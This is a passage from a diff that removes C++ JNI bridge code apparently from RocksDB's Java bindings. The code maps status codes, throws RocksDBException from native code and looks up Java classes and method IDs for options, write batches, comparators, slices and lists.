-      case rocksdb::Status::Code::kTryAgain:
-        return 0xD;
-      default:
-        return 0x7F;  // undefined
-    }
-  }
-
-  // Returns the equivalent org.rocksdb.Status.SubCode for the provided
-  // C++ rocksdb::Status::SubCode enum
-  static jbyte toJavaStatusSubCode(const rocksdb::Status::SubCode& subCode) {
-    switch (subCode) {
-      case rocksdb::Status::SubCode::kNone:
-        return 0x0;
-      case rocksdb::Status::SubCode::kMutexTimeout:
-        return 0x1;
-      case rocksdb::Status::SubCode::kLockTimeout:
-        return 0x2;
-      case rocksdb::Status::SubCode::kLockLimit:
-        return 0x3;
-      case rocksdb::Status::SubCode::kMaxSubCode:
-        return 0x7E;
-      default:
-        return 0x7F;  // undefined
-    }
-  }
-};
-
-// The portal class for org.rocksdb.RocksDBException
-class RocksDBExceptionJni :
-    public JavaException<RocksDBExceptionJni> {
- public:
-  /**
-   * Get the Java Class org.rocksdb.RocksDBException
-   *
-   * @param env A pointer to the Java environment
-   *
-   * @return The Java Class or nullptr if one of the
-   *     ClassFormatError, ClassCircularityError, NoClassDefFoundError,
-   *     OutOfMemoryError or ExceptionInInitializerError exceptions is thrown
-   */
-  static jclass getJClass(JNIEnv* env) {
-    return JavaException::getJClass(env, "org/rocksdb/RocksDBException");
-  }
-
-  /**
-   * Create and throw a Java RocksDBException with the provided message
-   *
-   * @param env A pointer to the Java environment
-   * @param msg The message for the exception
-   *
-   * @return true if an exception was thrown, false otherwise
-   */
-  static bool ThrowNew(JNIEnv* env, const std::string& msg) {
-    return JavaException::ThrowNew(env, msg);
-  }
-
-  /**
-   * Create and throw a Java RocksDBException with the provided status
-   *
-   * If s.ok() == true, then this function will not throw any exception.
-   *
-   * @param env A pointer to the Java environment
-   * @param s The status for the exception
-   *
-   * @return true if an exception was thrown, false otherwise
-   */
-  static bool ThrowNew(JNIEnv* env, const Status& s) {
-    assert(!s.ok());
-    if (s.ok()) {
-      return false;
-    }
-
-    // get the RocksDBException class
-    jclass jclazz = getJClass(env);
-    if(jclazz == nullptr) {
-      // exception occurred accessing class
-      std::cerr << "RocksDBExceptionJni::ThrowNew/class - Error: unexpected exception!" << std::endl;
-      return env->ExceptionCheck();
-    }
-
-    // get the constructor of org.rocksdb.RocksDBException
-    jmethodID mid =
-        env->GetMethodID(jclazz, "<init>", "(Lorg/rocksdb/Status;)V");
-    if(mid == nullptr) {
-      // exception thrown: NoSuchMethodException or OutOfMemoryError
-      std::cerr << "RocksDBExceptionJni::ThrowNew/cstr - Error: unexpected exception!" << std::endl;
-      return env->ExceptionCheck();
-    }
-
-    // get the Java status object
-    jobject jstatus = StatusJni::construct(env, s);
-    if(jstatus == nullptr) {
-      // exception occcurred
-      std::cerr << "RocksDBExceptionJni::ThrowNew/StatusJni - Error: unexpected exception!" << std::endl;
-      return env->ExceptionCheck();
-    }
-
-    // construct the RocksDBException
-    jthrowable rocksdb_exception = reinterpret_cast<jthrowable>(env->NewObject(jclazz, mid, jstatus));
-    if(env->ExceptionCheck()) {
-      if(jstatus != nullptr) {
-        env->DeleteLocalRef(jstatus);
-      }
-      if(rocksdb_exception != nullptr) {
-        env->DeleteLocalRef(rocksdb_exception);
-      }
-      std::cerr << "RocksDBExceptionJni::ThrowNew/NewObject - Error: unexpected exception!" << std::endl;
-      return true;
-    }
-
-    // throw the RocksDBException
-    const jint rs = env->Throw(rocksdb_exception);
-    if(rs != JNI_OK) {
-      // exception could not be thrown
-      std::cerr << "RocksDBExceptionJni::ThrowNew - Fatal: could not throw exception!" << std::endl;
-      if(jstatus != nullptr) {
-        env->DeleteLocalRef(jstatus);
-      }
-      if(rocksdb_exception != nullptr) {
-        env->DeleteLocalRef(rocksdb_exception);
-      }
-      return env->ExceptionCheck();
-    }
-
-    if(jstatus != nullptr) {
-      env->DeleteLocalRef(jstatus);
-    }
-    if(rocksdb_exception != nullptr) {
-      env->DeleteLocalRef(rocksdb_exception);
-    }
-
-    return true;
-  }
-
-  /**
-   * Create and throw a Java RocksDBException with the provided message
-   * and status
-   *
-   * If s.ok() == true, then this function will not throw any exception.
-   *
-   * @param env A pointer to the Java environment
-   * @param msg The message for the exception
-   * @param s The status for the exception
-   *
-   * @return true if an exception was thrown, false otherwise
-   */
-  static bool ThrowNew(JNIEnv* env, const std::string& msg, const Status& s) {
-    assert(!s.ok());
-    if (s.ok()) {
-      return false;
-    }
-
-    // get the RocksDBException class
-    jclass jclazz = getJClass(env);
-    if(jclazz == nullptr) {
-      // exception occurred accessing class
-      std::cerr << "RocksDBExceptionJni::ThrowNew/class - Error: unexpected exception!" << std::endl;
-      return env->ExceptionCheck();
-    }
-
-    // get the constructor of org.rocksdb.RocksDBException
-    jmethodID mid =
-        env->GetMethodID(jclazz, "<init>", "(Ljava/lang/String;Lorg/rocksdb/Status;)V");
-    if(mid == nullptr) {
-      // exception thrown: NoSuchMethodException or OutOfMemoryError
-      std::cerr << "RocksDBExceptionJni::ThrowNew/cstr - Error: unexpected exception!" << std::endl;
-      return env->ExceptionCheck();
-    }
-
-    jstring jmsg = env->NewStringUTF(msg.c_str());
-    if(jmsg == nullptr) {
-      // exception thrown: OutOfMemoryError
-      std::cerr << "RocksDBExceptionJni::ThrowNew/msg - Error: unexpected exception!" << std::endl;
-      return env->ExceptionCheck();
-    }
-
-    // get the Java status object
-    jobject jstatus = StatusJni::construct(env, s);
-    if(jstatus == nullptr) {
-      // exception occcurred
-      std::cerr << "RocksDBExceptionJni::ThrowNew/StatusJni - Error: unexpected exception!" << std::endl;
-      if(jmsg != nullptr) {
-        env->DeleteLocalRef(jmsg);
-      }
-      return env->ExceptionCheck();
-    }
-
-    // construct the RocksDBException
-    jthrowable rocksdb_exception = reinterpret_cast<jthrowable>(env->NewObject(jclazz, mid, jmsg, jstatus));
-    if(env->ExceptionCheck()) {
-      if(jstatus != nullptr) {
-        env->DeleteLocalRef(jstatus);
-      }
-      if(jmsg != nullptr) {
-        env->DeleteLocalRef(jmsg);
-      }
-      if(rocksdb_exception != nullptr) {
-        env->DeleteLocalRef(rocksdb_exception);
-      }
-      std::cerr << "RocksDBExceptionJni::ThrowNew/NewObject - Error: unexpected exception!" << std::endl;
-      return true;
-    }
-
-    // throw the RocksDBException
-    const jint rs = env->Throw(rocksdb_exception);
-    if(rs != JNI_OK) {
-      // exception could not be thrown
-      std::cerr << "RocksDBExceptionJni::ThrowNew - Fatal: could not throw exception!" << std::endl;
-      if(jstatus != nullptr) {
-        env->DeleteLocalRef(jstatus);
-      }
-      if(jmsg != nullptr) {
-        env->DeleteLocalRef(jmsg);
-      }
-      if(rocksdb_exception != nullptr) {
-        env->DeleteLocalRef(rocksdb_exception);
-      }
-      return env->ExceptionCheck();
-    }
-
-    if(jstatus != nullptr) {
-      env->DeleteLocalRef(jstatus);
-    }
-    if(jmsg != nullptr) {
-      env->DeleteLocalRef(jmsg);
-    }
-    if(rocksdb_exception != nullptr) {
-      env->DeleteLocalRef(rocksdb_exception);
-    }
-
-    return true;
-  }
-};
-
-// The portal class for java.lang.IllegalArgumentException
-class IllegalArgumentExceptionJni :
-    public JavaException<IllegalArgumentExceptionJni> {
- public:
-  /**
-   * Get the Java Class java.lang.IllegalArgumentException
-   *
-   * @param env A pointer to the Java environment
-   *
-   * @return The Java Class or nullptr if one of the
-   *     ClassFormatError, ClassCircularityError, NoClassDefFoundError,
-   *     OutOfMemoryError or ExceptionInInitializerError exceptions is thrown
-   */
-  static jclass getJClass(JNIEnv* env) {
-    return JavaException::getJClass(env, "java/lang/IllegalArgumentException");
-  }
-
-  /**
-   * Create and throw a Java IllegalArgumentException with the provided status
-   *
-   * If s.ok() == true, then this function will not throw any exception.
-   *
-   * @param env A pointer to the Java environment
-   * @param s The status for the exception
-   *
-   * @return true if an exception was thrown, false otherwise
-   */
-  static bool ThrowNew(JNIEnv* env, const Status& s) {
-    assert(!s.ok());
-    if (s.ok()) {
-      return false;
-    }
-
-    // get the IllegalArgumentException class
-    jclass jclazz = getJClass(env);
-    if(jclazz == nullptr) {
-      // exception occurred accessing class
-      std::cerr << "IllegalArgumentExceptionJni::ThrowNew/class - Error: unexpected exception!" << std::endl;
-      return env->ExceptionCheck();
-    }
-
-    return JavaException::ThrowNew(env, s.ToString());
-  }
-};
-
-
-// The portal class for org.rocksdb.Options
-class OptionsJni : public RocksDBNativeClass<
-    rocksdb::Options*, OptionsJni> {
- public:
-  /**
-   * Get the Java Class org.rocksdb.Options
-   *
-   * @param env A pointer to the Java environment
-   *
-   * @return The Java Class or nullptr if one of the
-   *     ClassFormatError, ClassCircularityError, NoClassDefFoundError,
-   *     OutOfMemoryError or ExceptionInInitializerError exceptions is thrown
-   */
-  static jclass getJClass(JNIEnv* env) {
-    return RocksDBNativeClass::getJClass(env, "org/rocksdb/Options");
-  }
-};
-
-// The portal class for org.rocksdb.DBOptions
-class DBOptionsJni : public RocksDBNativeClass<
-    rocksdb::DBOptions*, DBOptionsJni> {
- public:
-  /**
-   * Get the Java Class org.rocksdb.DBOptions
-   *
-   * @param env A pointer to the Java environment
-   *
-   * @return The Java Class or nullptr if one of the
-   *     ClassFormatError, ClassCircularityError, NoClassDefFoundError,
-   *     OutOfMemoryError or ExceptionInInitializerError exceptions is thrown
-   */
-  static jclass getJClass(JNIEnv* env) {
-    return RocksDBNativeClass::getJClass(env, "org/rocksdb/DBOptions");
-  }
-};
-
-class ColumnFamilyDescriptorJni : public JavaClass {
- public:
-  /**
-   * Get the Java Class org.rocksdb.ColumnFamilyDescriptor
-   *
-   * @param env A pointer to the Java environment
-   *
-   * @return The Java Class or nullptr if one of the
-   *     ClassFormatError, ClassCircularityError, NoClassDefFoundError,
-   *     OutOfMemoryError or ExceptionInInitializerError exceptions is thrown
-   */
-  static jclass getJClass(JNIEnv* env) {
-    return JavaClass::getJClass(env, "org/rocksdb/ColumnFamilyDescriptor");
-  }
-
-  /**
-   * Get the Java Method: ColumnFamilyDescriptor#columnFamilyName
-   *
-   * @param env A pointer to the Java environment
-   *
-   * @return The Java Method ID or nullptr if the class or method id could not
-   *     be retieved
-   */
-  static jmethodID getColumnFamilyNameMethod(JNIEnv* env) {
-    jclass jclazz = getJClass(env);
-    if(jclazz == nullptr) {
-      // exception occurred accessing class
-      return nullptr;
-    }
-
-    static jmethodID mid =
-        env->GetMethodID(jclazz, "columnFamilyName", "()[B");
-    assert(mid != nullptr);
-    return mid;
-  }
-
-  /**
-   * Get the Java Method: ColumnFamilyDescriptor#columnFamilyOptions
-   *
-   * @param env A pointer to the Java environment
-   *
-   * @return The Java Method ID or nullptr if the class or method id could not
-   *     be retieved
-   */
-  static jmethodID getColumnFamilyOptionsMethod(JNIEnv* env) {
-    jclass jclazz = getJClass(env);
-    if(jclazz == nullptr) {
-      // exception occurred accessing class
-      return nullptr;
-    }
-
-    static jmethodID mid =
-        env->GetMethodID(jclazz, "columnFamilyOptions",
-            "()Lorg/rocksdb/ColumnFamilyOptions;");
-    assert(mid != nullptr);
-    return mid;
-  }
-};
-
-// The portal class for org.rocksdb.ColumnFamilyOptions
-class ColumnFamilyOptionsJni : public RocksDBNativeClass<
-    rocksdb::ColumnFamilyOptions*, ColumnFamilyOptionsJni> {
- public:
-  /**
-   * Get the Java Class org.rocksdb.ColumnFamilyOptions
-   *
-   * @param env A pointer to the Java environment
-   *
-   * @return The Java Class or nullptr if one of the
-   *     ClassFormatError, ClassCircularityError, NoClassDefFoundError,
-   *     OutOfMemoryError or ExceptionInInitializerError exceptions is thrown
-   */
-  static jclass getJClass(JNIEnv* env) {
-    return RocksDBNativeClass::getJClass(env,
-        "org/rocksdb/ColumnFamilyOptions");
-  }
-};
-
-// The portal class for org.rocksdb.WriteOptions
-class WriteOptionsJni : public RocksDBNativeClass<
-    rocksdb::WriteOptions*, WriteOptionsJni> {
- public:
-  /**
-   * Get the Java Class org.rocksdb.WriteOptions
-   *
-   * @param env A pointer to the Java environment
-   *
-   * @return The Java Class or nullptr if one of the
-   *     ClassFormatError, ClassCircularityError, NoClassDefFoundError,
-   *     OutOfMemoryError or ExceptionInInitializerError exceptions is thrown
-   */
-  static jclass getJClass(JNIEnv* env) {
-    return RocksDBNativeClass::getJClass(env, "org/rocksdb/WriteOptions");
-  }
-};
-
-// The portal class for org.rocksdb.ReadOptions
-class ReadOptionsJni : public RocksDBNativeClass<
-    rocksdb::ReadOptions*, ReadOptionsJni> {
- public:
-  /**
-   * Get the Java Class org.rocksdb.ReadOptions
-   *
-   * @param env A pointer to the Java environment
-   *
-   * @return The Java Class or nullptr if one of the
-   *     ClassFormatError, ClassCircularityError, NoClassDefFoundError,
-   *     OutOfMemoryError or ExceptionInInitializerError exceptions is thrown
-   */
-  static jclass getJClass(JNIEnv* env) {
-    return RocksDBNativeClass::getJClass(env, "org/rocksdb/ReadOptions");
-  }
-};
-
-// The portal class for org.rocksdb.WriteBatch
-class WriteBatchJni : public RocksDBNativeClass<
-    rocksdb::WriteBatch*, WriteBatchJni> {
- public:
-  /**
-   * Get the Java Class org.rocksdb.WriteBatch
-   *
-   * @param env A pointer to the Java environment
-   *
-   * @return The Java Class or nullptr if one of the
-   *     ClassFormatError, ClassCircularityError, NoClassDefFoundError,
-   *     OutOfMemoryError or ExceptionInInitializerError exceptions is thrown
-   */
-  static jclass getJClass(JNIEnv* env) {
-    return RocksDBNativeClass::getJClass(env, "org/rocksdb/WriteBatch");
-  }
-};
-
-// The portal class for org.rocksdb.WriteBatch.Handler
-class WriteBatchHandlerJni : public RocksDBNativeClass<
-    const rocksdb::WriteBatchHandlerJniCallback*,
-    WriteBatchHandlerJni> {
- public:
-  /**
-   * Get the Java Class org.rocksdb.WriteBatch.Handler
-   *
-   * @param env A pointer to the Java environment
-   *
-   * @return The Java Class or nullptr if one of the
-   *     ClassFormatError, ClassCircularityError, NoClassDefFoundError,
-   *     OutOfMemoryError or ExceptionInInitializerError exceptions is thrown
-   */
-  static jclass getJClass(JNIEnv* env) {
-    return RocksDBNativeClass::getJClass(env,
-        "org/rocksdb/WriteBatch$Handler");
-  }
-
-  /**
-   * Get the Java Method: WriteBatch.Handler#put
-   *
-   * @param env A pointer to the Java environment
-   *
-   * @return The Java Method ID or nullptr if the class or method id could not
-   *     be retieved
-   */
-  static jmethodID getPutMethodId(JNIEnv* env) {
-    jclass jclazz = getJClass(env);
-    if(jclazz == nullptr) {
-      // exception occurred accessing class
-      return nullptr;
-    }
-
-    static jmethodID mid = env->GetMethodID(jclazz, "put", "([B[B)V");
-    assert(mid != nullptr);
-    return mid;
-  }
-
-  /**
-   * Get the Java Method: WriteBatch.Handler#merge
-   *
-   * @param env A pointer to the Java environment
-   *
-   * @return The Java Method ID or nullptr if the class or method id could not
-   *     be retieved
-   */
-  static jmethodID getMergeMethodId(JNIEnv* env) {
-    jclass jclazz = getJClass(env);
-    if(jclazz == nullptr) {
-      // exception occurred accessing class
-      return nullptr;
-    }
-
-    static jmethodID mid = env->GetMethodID(jclazz, "merge", "([B[B)V");
-    assert(mid != nullptr);
-    return mid;
-  }
-
-  /**
-   * Get the Java Method: WriteBatch.Handler#delete
-   *
-   * @param env A pointer to the Java environment
-   *
-   * @return The Java Method ID or nullptr if the class or method id could not
-   *     be retieved
-   */
-  static jmethodID getDeleteMethodId(JNIEnv* env) {
-    jclass jclazz = getJClass(env);
-    if(jclazz == nullptr) {
-      // exception occurred accessing class
-      return nullptr;
-    }
-
-    static jmethodID mid = env->GetMethodID(jclazz, "delete", "([B)V");
-    assert(mid != nullptr);
-    return mid;
-  }
-
-  /**
-   * Get the Java Method: WriteBatch.Handler#deleteRange
-   *
-   * @param env A pointer to the Java environment
-   *
-   * @return The Java Method ID or nullptr if the class or method id could not
-   *     be retieved
-   */
-  static jmethodID getDeleteRangeMethodId(JNIEnv* env) {
-    jclass jclazz = getJClass(env);
-    if (jclazz == nullptr) {
-      // exception occurred accessing class
-      return nullptr;
-    }
-
-    static jmethodID mid = env->GetMethodID(jclazz, "deleteRange", "([B[B)V");
-    assert(mid != nullptr);
-    return mid;
-  }
-
-  /**
-   * Get the Java Method: WriteBatch.Handler#logData
-   *
-   * @param env A pointer to the Java environment
-   *
-   * @return The Java Method ID or nullptr if the class or method id could not
-   *     be retieved
-   */
-  static jmethodID getLogDataMethodId(JNIEnv* env) {
-    jclass jclazz = getJClass(env);
-    if(jclazz == nullptr) {
-      // exception occurred accessing class
-      return nullptr;
-    }
-
-    static jmethodID mid = env->GetMethodID(jclazz, "logData", "([B)V");
-    assert(mid != nullptr);
-    return mid;
-  }
-
-  /**
-   * Get the Java Method: WriteBatch.Handler#shouldContinue
-   *
-   * @param env A pointer to the Java environment
-   *
-   * @return The Java Method ID or nullptr if the class or method id could not
-   *     be retieved
-   */
-  static jmethodID getContinueMethodId(JNIEnv* env) {
-    jclass jclazz = getJClass(env);
-    if(jclazz == nullptr) {
-      // exception occurred accessing class
-      return nullptr;
-    }
-
-    static jmethodID mid = env->GetMethodID(jclazz, "shouldContinue", "()Z");
-    assert(mid != nullptr);
-    return mid;
-  }
-};
-
-// The portal class for org.rocksdb.WriteBatchWithIndex
-class WriteBatchWithIndexJni : public RocksDBNativeClass<
-    rocksdb::WriteBatchWithIndex*, WriteBatchWithIndexJni> {
- public:
-  /**
-   * Get the Java Class org.rocksdb.WriteBatchWithIndex
-   *
-   * @param env A pointer to the Java environment
-   *
-   * @return The Java Class or nullptr if one of the
-   *     ClassFormatError, ClassCircularityError, NoClassDefFoundError,
-   *     OutOfMemoryError or ExceptionInInitializerError exceptions is thrown
-   */
-  static jclass getJClass(JNIEnv* env) {
-    return RocksDBNativeClass::getJClass(env,
-        "org/rocksdb/WriteBatchWithIndex");
-  }
-};
-
-// The portal class for org.rocksdb.HistogramData
-class HistogramDataJni : public JavaClass {
- public:
-  /**
-   * Get the Java Class org.rocksdb.HistogramData
-   *
-   * @param env A pointer to the Java environment
-   *
-   * @return The Java Class or nullptr if one of the
-   *     ClassFormatError, ClassCircularityError, NoClassDefFoundError,
-   *     OutOfMemoryError or ExceptionInInitializerError exceptions is thrown
-   */
-  static jclass getJClass(JNIEnv* env) {
-    return JavaClass::getJClass(env, "org/rocksdb/HistogramData");
-  }
-
-  /**
-   * Get the Java Method: HistogramData constructor
-   *
-   * @param env A pointer to the Java environment
-   *
-   * @return The Java Method ID or nullptr if the class or method id could not
-   *     be retieved
-   */
-  static jmethodID getConstructorMethodId(JNIEnv* env) {
-    jclass jclazz = getJClass(env);
-    if(jclazz == nullptr) {
-      // exception occurred accessing class
-      return nullptr;
-    }
-
-    static jmethodID mid = env->GetMethodID(jclazz, "<init>", "(DDDDD)V");
-    assert(mid != nullptr);
-    return mid;
-  }
-};
-
-// The portal class for org.rocksdb.BackupableDBOptions
-class BackupableDBOptionsJni : public RocksDBNativeClass<
-    rocksdb::BackupableDBOptions*, BackupableDBOptionsJni> {
- public:
-  /**
-   * Get the Java Class org.rocksdb.BackupableDBOptions
-   *
-   * @param env A pointer to the Java environment
-   *
-   * @return The Java Class or nullptr if one of the
-   *     ClassFormatError, ClassCircularityError, NoClassDefFoundError,
-   *     OutOfMemoryError or ExceptionInInitializerError exceptions is thrown
-   */
-  static jclass getJClass(JNIEnv* env) {
-    return RocksDBNativeClass::getJClass(env,
-        "org/rocksdb/BackupableDBOptions");
-  }
-};
-
-// The portal class for org.rocksdb.BackupEngine
-class BackupEngineJni : public RocksDBNativeClass<
-    rocksdb::BackupEngine*, BackupEngineJni> {
- public:
-  /**
-   * Get the Java Class org.rocksdb.BackupableEngine
-   *
-   * @param env A pointer to the Java environment
-   *
-   * @return The Java Class or nullptr if one of the
-   *     ClassFormatError, ClassCircularityError, NoClassDefFoundError,
-   *     OutOfMemoryError or ExceptionInInitializerError exceptions is thrown
-   */
-  static jclass getJClass(JNIEnv* env) {
-    return RocksDBNativeClass::getJClass(env, "org/rocksdb/BackupEngine");
-  }
-};
-
-// The portal class for org.rocksdb.RocksIterator
-class IteratorJni : public RocksDBNativeClass<
-    rocksdb::Iterator*, IteratorJni> {
- public:
-  /**
-   * Get the Java Class org.rocksdb.RocksIterator
-   *
-   * @param env A pointer to the Java environment
-   *
-   * @return The Java Class or nullptr if one of the
-   *     ClassFormatError, ClassCircularityError, NoClassDefFoundError,
-   *     OutOfMemoryError or ExceptionInInitializerError exceptions is thrown
-   */
-  static jclass getJClass(JNIEnv* env) {
-    return RocksDBNativeClass::getJClass(env, "org/rocksdb/RocksIterator");
-  }
-};
-
-// The portal class for org.rocksdb.Filter
-class FilterJni : public RocksDBNativeClass<
-    std::shared_ptr<rocksdb::FilterPolicy>*, FilterJni> {
- public:
-  /**
-   * Get the Java Class org.rocksdb.Filter
-   *
-   * @param env A pointer to the Java environment
-   *
-   * @return The Java Class or nullptr if one of the
-   *     ClassFormatError, ClassCircularityError, NoClassDefFoundError,
-   *     OutOfMemoryError or ExceptionInInitializerError exceptions is thrown
-   */
-  static jclass getJClass(JNIEnv* env) {
-    return RocksDBNativeClass::getJClass(env, "org/rocksdb/Filter");
-  }
-};
-
-// The portal class for org.rocksdb.ColumnFamilyHandle
-class ColumnFamilyHandleJni : public RocksDBNativeClass<
-    rocksdb::ColumnFamilyHandle*, ColumnFamilyHandleJni> {
- public:
-  /**
-   * Get the Java Class org.rocksdb.ColumnFamilyHandle
-   *
-   * @param env A pointer to the Java environment
-   *
-   * @return The Java Class or nullptr if one of the
-   *     ClassFormatError, ClassCircularityError, NoClassDefFoundError,
-   *     OutOfMemoryError or ExceptionInInitializerError exceptions is thrown
-   */
-  static jclass getJClass(JNIEnv* env) {
-    return RocksDBNativeClass::getJClass(env,
-        "org/rocksdb/ColumnFamilyHandle");
-  }
-};
-
-// The portal class for org.rocksdb.FlushOptions
-class FlushOptionsJni : public RocksDBNativeClass<
-    rocksdb::FlushOptions*, FlushOptionsJni> {
- public:
-  /**
-   * Get the Java Class org.rocksdb.FlushOptions
-   *
-   * @param env A pointer to the Java environment
-   *
-   * @return The Java Class or nullptr if one of the
-   *     ClassFormatError, ClassCircularityError, NoClassDefFoundError,
-   *     OutOfMemoryError or ExceptionInInitializerError exceptions is thrown
-   */
-  static jclass getJClass(JNIEnv* env) {
-    return RocksDBNativeClass::getJClass(env, "org/rocksdb/FlushOptions");
-  }
-};
-
-// The portal class for org.rocksdb.ComparatorOptions
-class ComparatorOptionsJni : public RocksDBNativeClass<
-    rocksdb::ComparatorJniCallbackOptions*, ComparatorOptionsJni> {
- public:
-  /**
-   * Get the Java Class org.rocksdb.ComparatorOptions
-   *
-   * @param env A pointer to the Java environment
-   *
-   * @return The Java Class or nullptr if one of the
-   *     ClassFormatError, ClassCircularityError, NoClassDefFoundError,
-   *     OutOfMemoryError or ExceptionInInitializerError exceptions is thrown
-   */
-  static jclass getJClass(JNIEnv* env) {
-    return RocksDBNativeClass::getJClass(env, "org/rocksdb/ComparatorOptions");
-  }
-};
-
-// The portal class for org.rocksdb.AbstractComparator
-class AbstractComparatorJni : public RocksDBNativeClass<
-    const rocksdb::BaseComparatorJniCallback*,
-    AbstractComparatorJni> {
- public:
-  /**
-   * Get the Java Class org.rocksdb.AbstractComparator
-   *
-   * @param env A pointer to the Java environment
-   *
-   * @return The Java Class or nullptr if one of the
-   *     ClassFormatError, ClassCircularityError, NoClassDefFoundError,
-   *     OutOfMemoryError or ExceptionInInitializerError exceptions is thrown
-   */
-  static jclass getJClass(JNIEnv* env) {
-    return RocksDBNativeClass::getJClass(env,
-        "org/rocksdb/AbstractComparator");
-  }
-
-  /**
-   * Get the Java Method: Comparator#name
-   *
-   * @param env A pointer to the Java environment
-   *
-   * @return The Java Method ID or nullptr if the class or method id could not
-   *     be retieved
-   */
-  static jmethodID getNameMethodId(JNIEnv* env) {
-    jclass jclazz = getJClass(env);
-    if(jclazz == nullptr) {
-      // exception occurred accessing class
-      return nullptr;
-    }
-
-    static jmethodID mid =
-        env->GetMethodID(jclazz, "name", "()Ljava/lang/String;");
-    assert(mid != nullptr);
-    return mid;
-  }
-
-  /**
-   * Get the Java Method: Comparator#compare
-   *
-   * @param env A pointer to the Java environment
-   *
-   * @return The Java Method ID or nullptr if the class or method id could not
-   *     be retieved
-   */
-  static jmethodID getCompareMethodId(JNIEnv* env) {
-    jclass jclazz = getJClass(env);
-    if(jclazz == nullptr) {
-      // exception occurred accessing class
-      return nullptr;
-    }
-
-    static jmethodID mid =
-        env->GetMethodID(jclazz, "compare",
-            "(Lorg/rocksdb/AbstractSlice;Lorg/rocksdb/AbstractSlice;)I");
-    assert(mid != nullptr);
-    return mid;
-  }
-
-  /**
-   * Get the Java Method: Comparator#findShortestSeparator
-   *
-   * @param env A pointer to the Java environment
-   *
-   * @return The Java Method ID or nullptr if the class or method id could not
-   *     be retieved
-   */
-  static jmethodID getFindShortestSeparatorMethodId(JNIEnv* env) {
-    jclass jclazz = getJClass(env);
-    if(jclazz == nullptr) {
-      // exception occurred accessing class
-      return nullptr;
-    }
-
-    static jmethodID mid =
-        env->GetMethodID(jclazz, "findShortestSeparator",
-            "(Ljava/lang/String;Lorg/rocksdb/AbstractSlice;)Ljava/lang/String;");
-    assert(mid != nullptr);
-    return mid;
-  }
-
-  /**
-   * Get the Java Method: Comparator#findShortSuccessor
-   *
-   * @param env A pointer to the Java environment
-   *
-   * @return The Java Method ID or nullptr if the class or method id could not
-   *     be retieved
-   */
-  static jmethodID getFindShortSuccessorMethodId(JNIEnv* env) {
-    jclass jclazz = getJClass(env);
-    if(jclazz == nullptr) {
-      // exception occurred accessing class
-      return nullptr;
-    }
-
-    static jmethodID mid =
-        env->GetMethodID(jclazz, "findShortSuccessor",
-            "(Ljava/lang/String;)Ljava/lang/String;");
-    assert(mid != nullptr);
-    return mid;
-  }
-};
-
-// The portal class for org.rocksdb.AbstractSlice
-class AbstractSliceJni : public NativeRocksMutableObject<
-    const rocksdb::Slice*, AbstractSliceJni> {
- public:
-  /**
-   * Get the Java Class org.rocksdb.AbstractSlice
-   *
-   * @param env A pointer to the Java environment
-   *
-   * @return The Java Class or nullptr if one of the
-   *     ClassFormatError, ClassCircularityError, NoClassDefFoundError,
-   *     OutOfMemoryError or ExceptionInInitializerError exceptions is thrown
-   */
-  static jclass getJClass(JNIEnv* env) {
-    return RocksDBNativeClass::getJClass(env, "org/rocksdb/AbstractSlice");
-  }
-};
-
-// The portal class for org.rocksdb.Slice
-class SliceJni : public NativeRocksMutableObject<
-    const rocksdb::Slice*, AbstractSliceJni> {
- public:
-  /**
-   * Get the Java Class org.rocksdb.Slice
-   *
-   * @param env A pointer to the Java environment
-   *
-   * @return The Java Class or nullptr if one of the
-   *     ClassFormatError, ClassCircularityError, NoClassDefFoundError,
-   *     OutOfMemoryError or ExceptionInInitializerError exceptions is thrown
-   */
-  static jclass getJClass(JNIEnv* env) {
-    return RocksDBNativeClass::getJClass(env, "org/rocksdb/Slice");
-  }
-
-  /**
-   * Constructs a Slice object
-   *
-   * @param env A pointer to the Java environment
-   *
-   * @return A reference to a Java Slice object, or a nullptr if an
-   *     exception occurs
-   */
-  static jobject construct0(JNIEnv* env) {
-    jclass jclazz = getJClass(env);
-    if(jclazz == nullptr) {
-      // exception occurred accessing class
-      return nullptr;
-    }
-
-    static jmethodID mid = env->GetMethodID(jclazz, "<init>", "()V");
-    if(mid == nullptr) {
-      // exception occurred accessing method
-      return nullptr;
-    }
-    
-    jobject jslice = env->NewObject(jclazz, mid);
-    if(env->ExceptionCheck()) {
-      return nullptr;
-    }
-
-    return jslice;
-  }
-};
-
-// The portal class for org.rocksdb.DirectSlice
-class DirectSliceJni : public NativeRocksMutableObject<
-    const rocksdb::Slice*, AbstractSliceJni> {
- public:
-  /**
-   * Get the Java Class org.rocksdb.DirectSlice
-   *
-   * @param env A pointer to the Java environment
-   *
-   * @return The Java Class or nullptr if one of the
-   *     ClassFormatError, ClassCircularityError, NoClassDefFoundError,
-   *     OutOfMemoryError or ExceptionInInitializerError exceptions is thrown
-   */
-  static jclass getJClass(JNIEnv* env) {
-    return RocksDBNativeClass::getJClass(env, "org/rocksdb/DirectSlice");
-  }
-
-  /**
-   * Constructs a DirectSlice object
-   *
-   * @param env A pointer to the Java environment
-   *
-   * @return A reference to a Java DirectSlice object, or a nullptr if an
-   *     exception occurs
-   */
-  static jobject construct0(JNIEnv* env) {
-    jclass jclazz = getJClass(env);
-    if(jclazz == nullptr) {
-      // exception occurred accessing class
-      return nullptr;
-    }
-
-    static jmethodID mid = env->GetMethodID(jclazz, "<init>", "()V");
-    if(mid == nullptr) {
-      // exception occurred accessing method
-      return nullptr;
-    }
-
-    jobject jdirect_slice = env->NewObject(jclazz, mid);
-    if(env->ExceptionCheck()) {
-      return nullptr;
-    }
-
-    return jdirect_slice;
-  }
-};
-
-// The portal class for java.util.List
-class ListJni : public JavaClass {
- public:
-  /**
-   * Get the Java Class java.util.List
-   *
-   * @param env A pointer to the Java environment
-   *
-   * @return The Java Class or nullptr if one of the
-   *     ClassFormatError, ClassCircularityError, NoClassDefFoundError,
-   *     OutOfMemoryError or ExceptionInInitializerError exceptions is thrown
-   */
-  static jclass getListClass(JNIEnv* env) {
-    return JavaClass::getJClass(env, "java/util/List");
-  }
-
-  /**
-   * Get the Java Class java.util.ArrayList
-   *
-   * @param env A pointer to the Java environment
-   *
-   * @return The Java Class or nullptr if one of the
-   *     ClassFormatError, ClassCircularityError, NoClassDefFoundError,
-   *     OutOfMemoryError or ExceptionInInitializerError exceptions is thrown
-   */
-  static jclass getArrayListClass(JNIEnv* env) {
-    return JavaClass::getJClass(env, "java/util/ArrayList");
-  }
-
-  /**
-   * Get the Java Class java.util.Iterator
-   *
-   * @param env A pointer to the Java environment
-   *
-   * @return The Java Class or nullptr if one of the
-   *     ClassFormatError, ClassCircularityError, NoClassDefFoundError,
